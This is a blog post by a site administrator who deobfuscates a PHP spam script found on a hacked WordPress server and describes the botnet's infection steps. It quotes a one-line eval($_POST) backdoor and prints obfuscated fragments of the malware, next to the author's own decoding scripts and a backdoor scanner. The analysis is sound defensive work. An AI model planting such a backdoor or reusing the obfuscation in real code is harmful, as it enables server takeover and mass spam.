Dissecting a spammer’s spam script

Let’s take a look at a PHP script used to send spam. Scripts like this one run on servers all over the world, and dissecting one might give you some insight into a spammer’s dedication to annoying the hell out of you.

Spammers abuse known flaws in unsecured websites and applications to break into a server and install scripts that are able to send loads of spam. This is one of the reasons why it’s hard to get rid of all spam: determining absolute trust in a sender is hard to achieve, since a fully hardened server can be a Swiss cheese a few zero-day exploits later.

Everyone running a mildly popular WordPress site knows that exploits can be really easily introduced by installing plugins from a less than reputable source – or by not keeping your plugins up to date. Sometimes, a zero-day exploit for a popular WordPress plugin is exposed and thousands of installations worldwide are infected instantly.

One of the WordPress sites on a shared hosting web server I manage was infected by a spam script. Fortunately, the script was unable to do any real damage and was detected within half an hour of infection. I thought it would be fun to show you the script and dissect it, to find out exactly how these things work and make thousands of email administrators’ lives a living hell.

Website infection

Infection of a website by a spammer is almost always performed by their botnet. The nodes coordinate attacks and will try to perform these three actions from different IP addresses:

  1. Abuse an exploit in order to install a minimal script: eval($_POST['input_from_spammer']);
  2. This script, usually edited into one of WordPress’s or a plugin’s publicly accessible PHP files, is executed many times with different inputs to install even more of these evaluation scripts
  3. Finally, when a website is compromised up to the point where fixing it manually is not really an option anymore, obfuscated hacking and spamming scripts are installed

Steps 1 and 2 make sure the website remains compromised, even if an administrator decides to reinstall the website or restore a backup (without checking all the locations the spammer had access to). Step 3 results in a few easily recognizable script files that perform the dirty work.

Why wouldn’t they just stop after step 1 and inject the spam scripts through the eval() mechanism? My guess is that they want to keep a low(er) profile: uploading a big script once and then sending only the necessary spamming information in a minimal format is better when you’re trying to hide your actions.
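
Because steps 1 and 2 scatter eval() backdoors over many files, a cleanup has to look at every PHP file, not just the obvious ones. Here is a minimal sketch of such a check, assuming the backdoor appears in the plain form shown in step 1. The function name find_eval_backdoors and the list of superglobals are hypothetical choices for illustration, and an obfuscated backdoor will slip past it:

```php
<?php
// Hypothetical helper: lists PHP files under $root that pass request data
// straight into eval(), the minimal backdoor from step 1.
function find_eval_backdoors(string $root): array
{
    $hits = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );

    foreach ($files as $file) {
        if (!$file->isFile() || strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $code = file_get_contents($file->getPathname());
        // Assumed pattern: eval( followed by a request superglobal.
        if ($code !== false
            && preg_match('/\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b/i', $code)) {
            $hits[] = $file->getPathname();
        }
    }

    sort($hits);
    return $hits;
}
```

An empty result only means that this one plain pattern was not found; it does not prove that the site is clean.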

Deobfuscating the spam script

Step 1: determine method of obfuscation

So let’s take a look at the unaltered, obfuscated script as it was found in the exploited installation of WordPress.

The first thing I noticed was that everything was squeezed onto one long messy line. The next obvious deduction is that some kind of transcoding is going on:

$GLOBALS['jihux92'] = $j10[86].$j10[62].$j10[86].$j10[64].$j10[73].$j10[27].$j10[19]; $GLOBALS['qsxte55'] = $j10[27].$j10[0].$j10[0].$j10[15].$j10[0].$j10[64].$j10[0].$j10[27].$j10[39].$j10[15].$j10[0].$j10[19].$j10[86].$j10[62].$j10[79]; $GLOBALS['eexet82'] = $j10[30].$j10[73].$j10[15].$j10[62].$j10[64].$j10[33].$j10[27].$j10[6].$j10[15].$j10[33].$j10[27]; $GLOBALS['cydwn23'] = $j10[93].$j10[92].$j10[93].$j10[33].$j10[12].$j10[87].$j10[87]; $GLOBALS['dmvah16'] = $j10[33].$j10[27].$j10[56].$j10[86].$j10[62].$j10[27];
// etcetera

My next steps would be to make this mess a bit more readable and try to reverse the transcoding used for pretty much everything.

Step 2: introduce newlines

I replace every semicolon with a semicolon followed by a newline. This gives me a better overview of some of the things that take place:

$GLOBALS['dmvah16'] = $j10[33].$j10[27].$j10[56].$j10[86].$j10[62].$j10[27];
$GLOBALS['uvmxr50'] = $j10[86].$j10[73].$j10[30].$j10[33].$j10[62].$j10[87].$j10[90];
$GLOBALS['oluxf50'] = $j10[54].$j10[57].$j10[16].$j10[54].$j10[86].$j10[50].$j10[80];
$GLOBALS['gyeof37'] = $j10[16].$j10[33].$j10[5];
$GLOBALS['frpwz79'] = $j10[6].$j10[15].$j10[57].$j10[62].$j10[19];
$GLOBALS['yguel83'] = $j10[19].$j10[86].$j10[16].$j10[27];
$GLOBALS['vrubd73'] = $j10[6].$j10[15].$j10[62].$j10[73].$j10[19].$j10[38].$j10[62].$j10[19];
$GLOBALS['cnftt27'] = $j10[16].$j10[52].$j10[33].$j10[19].$j10[61].$j10[55].$j10[53];
$GLOBALS['lfazz33'] = $j10[54].$j10[33].$j10[15].$j10[61].$j10[52].$j10[55].$j10[55];
$GLOBALS['haimq43'] = $j10[92].$j10[79].$j10[0].$j10[19].$j10[0].$j10[80];
$GLOBALS['xfeye26'] = $j10[86].$j10[16].$j10[39].$j10[75].$j10[15].$j10[33].$j10[27];
$GLOBALS['whzhh71'] = $j10[38].$j10[0].$j10[0].$j10[38].$j10[20].$j10[64].$j10[93].$j10[27].$j10[20].$j10[73];
$GLOBALS['bqdjr8'] = $j10[0].$j10[15].$j10[9].$j10[16].$j10[38].$j10[50].$j10[53];
$GLOBALS['uulbr4'] = $j10[16].$j10[15].$j10[86].$j10[30].$j10[93].$j10[90].$j10[87];
$GLOBALS['nqqaa78'] = $j10[27].$j10[93].$j10[75].$j10[7].$j10[20].$j10[90].$j10[90];
$GLOBALS['mdxuq1'] = $j10[0].$j10[61].$j10[54].$j10[62].$j10[7].$j10[53];

Some global assignments, probably used to share variables between function invocations without actually passing those variables as arguments. I discover two separate declarations of variables at the top of the script:

$pate="eyIubXguYW9sLm ...... hbSBwZXIiXX19fQ==";
$j10="rA;@{5cqVb/Fh<\"omGQtyHMZ`Y[eB&j] dO%W'ap-I!?1X\n^9L7Nx6z4fu}S*wn\r_=JU\t(E\\~s>lR.Kg3C)|:Ti8#\$20vkD+P,";

The two equals signs at the end of the $pate value look like base64 padding. The value of the $j10 variable looks completely random.

Step 3: replace the $j10 values

It looks like the variable $j10 is accessed a lot, and almost always in the context of string concatenation. This seems like a perfect candidate for some reverse transcoding! I ran the entire script through the decoder below:

$j10="rA;@{5cqVb/Fh<\"omGQtyHMZ`Y[eB&j] dO%W'ap-I!?1X\n^9L7Nx6z4fu}S*wn\r_=JU\t(E\\~s>lR.Kg3C)|:Ti8#\$20vkD+P,";

$data = file_get_contents($argv[1]);

for ($i = 0; $i < strlen($j10); ++$i) {
    $char = $j10[$i];
    $data = str_replace('$j10[' . $i . ']', '"' . addcslashes($char, "\r\n\"\\\t") . '"', $data);
}

echo $data;
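
The same substitution could also be done in a single pass with a regular expression instead of one str_replace() call per table index. This is only a sketch under assumptions: the function name inline_table_lookups is hypothetical, and unlike the decoder above it also escapes the dollar sign so that joining the pieces later cannot create an accidental variable interpolation:

```php
<?php
// Hypothetical single-pass variant: replaces every $var[N] lookup with the
// quoted character found at index N of the lookup table.
function inline_table_lookups(string $code, string $table, string $var = 'j10'): string
{
    $pattern = '/\$' . preg_quote($var, '/') . '\[(\d+)\]/';

    return preg_replace_callback($pattern, function (array $m) use ($table) {
        $index = (int) $m[1];
        if (!isset($table[$index])) {
            return $m[0]; // index outside the table: leave the lookup untouched
        }
        // Escape characters that are special inside a double-quoted PHP string.
        return '"' . addcslashes($table[$index], "\r\n\t\"\\\$") . '"';
    }, $code);
}
```

Called as inline_table_lookups($data, $j10), it would take the place of the loop in the decoder above.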

That bit from step 2 now looks like this:

$GLOBALS['dmvah16'] = "d"."e"."f"."i"."n"."e";
$GLOBALS['uvmxr50'] = "i"."s"."j"."d"."n"."8"."2";
$GLOBALS['oluxf50'] = "z"."u"."m"."z"."i"."7"."3";
$GLOBALS['gyeof37'] = "m"."d"."5";
$GLOBALS['frpwz79'] = "c"."o"."u"."n"."t";
$GLOBALS['yguel83'] = "t"."i"."m"."e";
$GLOBALS['vrubd73'] = "c"."o"."n"."s"."t"."a"."n"."t";
$GLOBALS['cnftt27'] = "m"."x"."d"."t"."w"."4"."6";
$GLOBALS['lfazz33'] = "z"."d"."o"."w"."x"."4"."4";
$GLOBALS['haimq43'] = "v"."g"."r"."t"."r"."3";
$GLOBALS['xfeye26'] = "i"."m"."p"."l"."o"."d"."e";
$GLOBALS['whzhh71'] = "a"."r"."r"."a"."y"."_"."k"."e"."y"."s";
$GLOBALS['bqdjr8'] = "r"."o"."b"."m"."a"."7"."6";
$GLOBALS['uulbr4'] = "m"."o"."i"."j"."k"."2"."8";
$GLOBALS['nqqaa78'] = "e"."k"."l"."q"."y"."2"."2";
$GLOBALS['mdxuq1'] = "r"."w"."z"."n"."q"."6";

Success! Some of these are references to PHP functions, let’s see how they are being used in the rest of the script:

$GLOBALS['gyeof37'](0987654321)

// translates to:

"md5"(0987654321)

// which is the equivalent of:

md5(0987654321)

The spammers use PHP’s variable functions to hide which functions they call. This works for every function invocation, whether the function is user-defined or built-in. Some PHP code looks like a function invocation but is actually a language construct (such as isset()), which cannot be called through a variable function and therefore stays readable:

if (!isset($vcmra37) || $vcmra37 == "") {

So I discover that not only did they hide their function invocations, they also obfuscated all variable names: $vcmra37 does not look like an intuitive name for a variable. I need to deal with both types of obfuscation in the next steps.
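
The variable function trick is easy to reproduce in isolation. The snippet below is a small illustration, not code from the spam script; the key demo_fn is made up:

```php
<?php
// 'demo_fn' is a made-up key; the name is split up the way the spam script does it.
$GLOBALS['demo_fn'] = "m" . "d" . "5";

// Calling through the string invokes the built-in md5().
$viaString = $GLOBALS['demo_fn']("spam");
var_dump($viaString === md5("spam")); // bool(true)

// isset is a language construct, not a function, so it has no callable name.
var_dump(function_exists('md5'));   // bool(true)
var_dump(function_exists('isset')); // bool(false)
```

This is why isset() shows up in the clear while calls such as md5() are hidden behind $GLOBALS lookups.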

Step 4: concatenate constant strings

Because I’ve simply replaced all instances of $j10[…] with the corresponding value, the script now contains a lot of concatenations of constant strings. It’s time to simplify those with the following sed invocation:

sed -e 's/"\."//g' input-script.php > output-script.php

This misses a few edge cases, but after tiny fixes at lines 356, 472 and 519 I end up with a parseable PHP script. Let’s see what those $GLOBALS declarations look like now:

$GLOBALS['dmvah16'] = "define";
$GLOBALS['uvmxr50'] = "isjdn82";
$GLOBALS['oluxf50'] = "zumzi73";
$GLOBALS['gyeof37'] = "md5";
$GLOBALS['frpwz79'] = "count";
$GLOBALS['yguel83'] = "time";
$GLOBALS['vrubd73'] = "constant";
$GLOBALS['cnftt27'] = "mxdtw46";
$GLOBALS['lfazz33'] = "zdowx44";
$GLOBALS['haimq43'] = "vgrtr3";
$GLOBALS['xfeye26'] = "implode";
$GLOBALS['whzhh71'] = "array_keys";
$GLOBALS['bqdjr8'] = "robma76";
$GLOBALS['uulbr4'] = "moijk28";
$GLOBALS['nqqaa78'] = "eklqy22";
$GLOBALS['mdxuq1'] = "rwznq6";

Great! Suddenly, pieces of code are starting to make sense:

$uiwvy47["s_header"] = "Date: " . @$GLOBALS['xzfoh12']("D, j M Y G:i:s O")."\r\n";

I still need to deal with those pesky invocations on string values found in the $GLOBALS array. Let’s do that now.
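
As an aside on the edge cases of the sed expression in this step: it works on raw text, so a string literal that itself consists of a dot confuses it. A token-based merge avoids that class of problem. The following is a sketch under assumptions, not what I actually ran; merge_constant_strings is a hypothetical name, and the check that skips risky merges is deliberately conservative:

```php
<?php
// Hypothetical helper: merges "a"."b" into "ab" by walking PHP tokens rather
// than raw text, so a string literal that itself contains a dot stays intact.
function merge_constant_strings(string $code): string
{
    $out = [];      // token texts emitted so far
    $isString = []; // parallel flags: is $out[$i] a double-quoted constant string?

    foreach (token_get_all($code) as $token) {
        $text = is_array($token) ? $token[1] : $token;
        $string = is_array($token)
            && $token[0] === T_CONSTANT_ENCAPSED_STRING
            && $text[0] === '"';

        $n = count($out);
        if ($string && $n >= 2 && $out[$n - 1] === '.' && $isString[$n - 2]) {
            $left = substr($out[$n - 2], 1, -1); // left literal without its quotes
            // Conservative assumption: skip the merge when joining could start
            // an interpolation or lengthen an octal/hex escape.
            if (!preg_match('/(\$|\{|\\\\[0-7]{1,2}|\\\\x[0-9A-Fa-f]?)$/', $left)) {
                array_pop($out);      // drop the "." operator
                array_pop($isString);
                $out[$n - 2] = '"' . $left . substr($text, 1);
                continue;
            }
        }

        $out[] = $text;
        $isString[] = $string;
    }

    return implode('', $out);
}
```

The input has to start with an opening <?php tag, otherwise token_get_all() treats everything as inline HTML and nothing is merged.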

Step 5: replace function invocations

I wrote a script to replace all $GLOBALS['foo'](...) invocations with their function equivalents, and at the same time remove the original $GLOBALS assignment:

$data = file_get_contents($argv[1]);

// Match all 'global' functions
$matches = [];
preg_match_all('#\\$GLOBALS\\[\'(.+?)\'\\] = "(.+?)";\\r\\n#', $data, $matches, PREG_SET_ORDER);

foreach ($matches as $match) {
    $obfuscatedName = $match[1];
    $actualName = $match[2];

    // Replace all function invocations
    $data = str_replace('$GLOBALS[\'' . $obfuscatedName . '\'](', $actualName . '(', $data);

    // Remove the obfuscation mapping
    $data = str_replace($match[0], '', $data);
}

echo $data;

So let’s see how the “xzfoh12” invocation is doing after the spam script I have so far is pulled through the above decoder:

$uiwvy47["s_header"] = "Date: " . @date("D, j M Y G:i:s O")."\r\n";

Awesome! I now have a simple date(...) invocation. Pieces of code are starting to reveal their true nature:

// ...
case constant("SOCKET_TYPE_FSOCKET"): $jxykg73 = @fsockopen($hpzaj3."://".$urvjq67, $fgzke40, $bfwyd21, $iiwxg60, $zcxlk81);
if ($jxykg73 && $jlfho78) { @stream_set_blocking($jxykg73, 0);
} @stream_set_timeout($jxykg73, $zcxlk81);
break;
// ...

Step 6: prettify the PHP code

Since I got the feeling that I was getting close to understanding what the script does, I used an online PHP prettifier called the Spark Labs PHP Formatter to clean up the script I had up until now. This helps immensely with understanding the general structure of the code; the previous excerpt now looks like this:

// ...
        case constant("SOCKET_TYPE_FSOCKET"):
            $jxykg73 = @fsockopen($hpzaj3 . "://" . $urvjq67, $fgzke40, $bfwyd21, $iiwxg60, $zcxlk81);
            if ($jxykg73 && $jlfho78) {
                @stream_set_blocking($jxykg73, 0);
            }
            @stream_set_timeout($jxykg73, $zcxlk81);
            break;
// ...

Although function and variable names are still obfuscated, I begin to see what functions were designed to do based on the PHP built-in functions they call and the constant string and integer values they use. Take a look for yourself in the prettified script.

Step 7: remove default $j10 argument

Instead of making $j10 a global variable, the spammer decided to pass the value along with every invocation of the user-defined functions. A quick check reveals that $j10 is not used anymore, since I replaced all accesses to that variable in step 3. Alright, some sed magic to make all those parameters disappear:

sed -e 's/(\$j10, /(/g' input-script.php > output-script.php

Following this modification, I manually remove the $j10 assignment at the top of the script.

Step 8: decode the $pate payload

I decide that to understand what the code is doing, I need to be able to look inside the $pate payload at the top of the script. Let’s take a look at how it’s used:

$pate = "eyIubXguY...X19fQ==";

$lerqj48 = json_decode(kvkdh88($pate), TRUE);

function kvkdh88($xmxkd83) {
    $fupzm37 = "";
    for ($hvyut10 = 0; $hvyut10 < 256; $hvyut10++) {
        $gzccs73[$hvyut10] = chr($hvyut10);
    }
    $hgtxt70 = array_flip(preg_split("//", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/", -1, 1));
    $qmmlq58 = array();
    preg_match_all("([A-z0-9+\\/]{1,4})", $xmxkd83, $qmmlq58);
    foreach ($qmmlq58[0] as $iejib94) {
        $hzgqj17 = 0;
        for ($hvyut10 = 0; isset($iejib94[$hvyut10]); $hvyut10++) {
            $hzgqj17 = ($hzgqj17 << 6) + $hgtxt70[$iejib94[$hvyut10]];
            if ($hvyut10 > 0) {
                $fupzm37 .= $gzccs73[$hzgqj17 >> (4 - (2 * ($hvyut10 - 1)))];
                $hzgqj17 = $hzgqj17 & (0xf >> (2 * ($hvyut10 - 1)));
            }
        }
    }
    return $fupzm37;
}

So whatever comes out of that kvkdh88 function must be a JSON string. Let’s see… that function applies a base64 character set, reads characters in blocks of at most 4 characters, some bit shifting going on… could this be a user-defined base64_decode()?

$pate = base64_decode("eyIubXguY...X19fQ==");
print_r($pate);

// output: '{".mx.aol.com":{...,"sr":["2 spam per"]}}}'

Yup, that’s it! I replace the $pate definition with the output I got and remove the kvkdh88 function altogether.
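
To convince yourself that the bit shifting really is plain base64, the function can be rewritten with readable names and compared against the built-in. This is my own cleaned-up sketch of kvkdh88, not the spammer’s code: the name readable_base64_decode is hypothetical, and the character class is narrowed to the actual base64 alphabet:

```php
<?php
// Readable sketch of the custom decoder; the name is hypothetical.
function readable_base64_decode(string $input): string
{
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
    $values = array_flip(str_split($alphabet)); // character => 6-bit value
    $output = '';

    // Split the input into groups of up to 4 base64 characters; "=" padding
    // is not part of the character class and is therefore skipped.
    preg_match_all('#[A-Za-z0-9+/]{1,4}#', $input, $groups);

    foreach ($groups[0] as $group) {
        $acc = 0;
        for ($i = 0; isset($group[$i]); $i++) {
            // Append the next 6 bits to the accumulator.
            $acc = ($acc << 6) + $values[$group[$i]];
            if ($i > 0) {
                // Emit the top 8 bits, keep the remaining 4, 2 or 0 bits.
                $output .= chr($acc >> (4 - 2 * ($i - 1)));
                $acc &= 0xf >> (2 * ($i - 1));
            }
        }
    }

    return $output;
}
```

For any string $s, readable_base64_decode(base64_encode($s)) should give back $s, which is the same round trip the built-in base64_decode() provides.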

Step 9: replace $_POST references

At the top of the script, another simple obfuscation takes place:

$GLOBALS['xyzta42'] = ${"_POST"};

Let’s get rid of those:

$data = file_get_contents($argv[1]);

// Remove definition
$data = str_replace('$GLOBALS[\'xyzta42\'] = ${"_POST"};' . "\n", '', $data);

// Replace usage
$data = str_replace('$GLOBALS[\'xyzta42\']', '$_POST', $data);

echo $data;

Step 10: map function and variable names

After reading through the code I have now, I discover something really helpful: variable name obfuscation is the same throughout the script for the same variable names, i.e. all equivalent variable names were modified to the same obfuscated variable name. If I translate a single variable name correctly, it will probably be correct for the entire script!

So I started translating function names and variable names, starting with the simpler functions and working up to the larger ones with lots of variables and function invocations – probably used for the overall spam logic. I put them in a JSON mapping file:

{
    "functions": {
        "rcptw89": "base64_xor2_decode",
        "zdowx44": "base64_xor2_encode",
        "fclwp59": "base64_xor2_url_decode_from_post",
        "kdpdr2":  "connection_close",
// ... a lot more ...

        "imqjm17": "smtp_get_error",
        "qbzer79": "smtp_parse_error_response",
        "tvchy30": "smtp_read",
        "rcljy83": "smtp_write"
    },
    "variables": {
        "nbcnq11": "address",
        "jxwad57": "conn_idx",
        "uiwvy47": "connection_info",
        "docef75": "connections",
// ... a lot more ...

        "lzjwd61": "spam_config",
        "jxykg73": "sp",
        "hbxeq24": "successful",
        "zcxlk81": "timeout"
    }
}

Let’s use this mapping with a final decoder script:

$data = file_get_contents($argv[1]);
$mapping = json_decode(file_get_contents($argv[2]), true);

foreach ($mapping['functions'] as $obfuscated => $decoded) {
    $data = str_replace($obfuscated . '(', $decoded . '(', $data);
}

foreach ($mapping['variables'] as $obfuscated => $decoded) {
    $data = str_replace('$' . $obfuscated, '$' . $decoded, $data);
}

echo $data;

Take a look at the final deobfuscated script! Some variables remain untranslated but their intention is clear. This is probably close enough to what the spammer originally wrote.
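
One caveat of plain str_replace() is that a short obfuscated name can also match the beginning of a longer one. A slightly more defensive variant of the renaming step might look like the sketch below. It assumes the same mapping structure as the JSON file above; the function name rename_identifiers is hypothetical:

```php
<?php
// Hypothetical variant of the renaming step: only whole identifiers are
// replaced, so "$abc1" is never rewritten as part of "$abc12".
function rename_identifiers(string $code, array $mapping): string
{
    foreach ($mapping['functions'] ?? [] as $from => $to) {
        // A name not preceded by "$" or a word character, followed by "(".
        $pattern = '/(?<![$\w])' . preg_quote($from, '/') . '(?=\s*\()/';
        $code = preg_replace_callback($pattern, function () use ($to) {
            return $to;
        }, $code);
    }

    foreach ($mapping['variables'] ?? [] as $from => $to) {
        // "$name" not followed by another word character.
        $pattern = '/\$' . preg_quote($from, '/') . '(?!\w)/';
        $code = preg_replace_callback($pattern, function () use ($to) {
            return '$' . $to;
        }, $code);
    }

    return $code;
}
```

It can be dropped into the decoder above as echo rename_identifiers($data, $mapping); in place of the two foreach loops.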

So what does this spam script do?

Basically, the spam script does the following in order:

  1. Load victim configuration passed by the spammer as POST variables to this script: spam_config_load(&$spam_config)
  2. For every victim address, initialize connection parameters
  3. Load retry time information from storage: retry_storage_read()
  4. Execute the main loop: spam_send_messages(&$connections, &$retry_time_storage, $hosts_info)
    1. Iterate over active connections and perform: connection_process(&$connections, &$retry_time_storage, $hosts_info)
    2. A state machine decides on the next action based on the connection’s current state
  5. Report the result of all spamming actions: spam_report($connections)
  6. Store retry information: retry_storage_write($retry_time_storage)

A number of things I think are noteworthy about this script:

  • The spammers are able to pass along not only the target email addresses of the victims, but also templates for things like the email’s body and subject.
  • Based on what was available in terms of PHP functionality, the script autodetects the best way to connect to an SMTP server.
  • The $pate data structure contains information about different SMTP hosts and the way they indicate grey- and blacklisting. If the script detects that the email was not outright rejected and a retry at some later point in time was in order, it stores this information per host in $retry_time_storage.
  • If socket_select() is available, the script maintains a number of simultaneous SMTP sessions and progresses them as soon as data is available to read.
  • The user-defined function dns_lookup($address) performs a custom-written DNS lookup over UDP against Google’s public DNS server (IP: 8.8.8.8) if PHP’s regular DNS functions are unavailable.
  • At certain points in the code a custom base64-plus-xor2 coding is applied. The ordinal values of bytes are XOR’ed with 2 before they are passed along to base64_encode(). My guess is that they did this so even if you found a value encoded this way, a simple base64_decode() would not be enough to reveal its contents.
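
The base64-plus-xor2 coding from the last point can be sketched in a few lines. This is a reconstruction from the description above, not a copy of the spammer’s functions; the names xor2, demo_xor2_encode and demo_xor2_decode are hypothetical:

```php
<?php
// XOR every byte with 2. Applying it twice restores the original bytes.
function xor2(string $bytes): string
{
    $out = '';
    for ($i = 0, $n = strlen($bytes); $i < $n; $i++) {
        $out .= chr(ord($bytes[$i]) ^ 2);
    }
    return $out;
}

// Encode: XOR first, then base64.
function demo_xor2_encode(string $plain): string
{
    return base64_encode(xor2($plain));
}

// Decode: base64 first, then XOR back.
function demo_xor2_decode(string $encoded): string
{
    return xor2(base64_decode($encoded));
}

$encoded = demo_xor2_encode('hello');
var_dump(base64_decode($encoded));     // string(5) "jgnnm"
var_dump(demo_xor2_decode($encoded));  // string(5) "hello"
```

A plain base64_decode() of such a value yields readable-looking garbage instead of the original text, which fits my guess about why they bothered.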

Final thoughts

This is the first time I decoded a spammer’s script, and I’m slightly impressed by the technical quality. I would never have expected a state machine, or the number of socket error codes that are handled gracefully. The custom-written DNS lookup with a proper response handling loop also surprised me. Someone was very seriously trying to spam people.

My question for you: can you find the source of this evil? Let me know!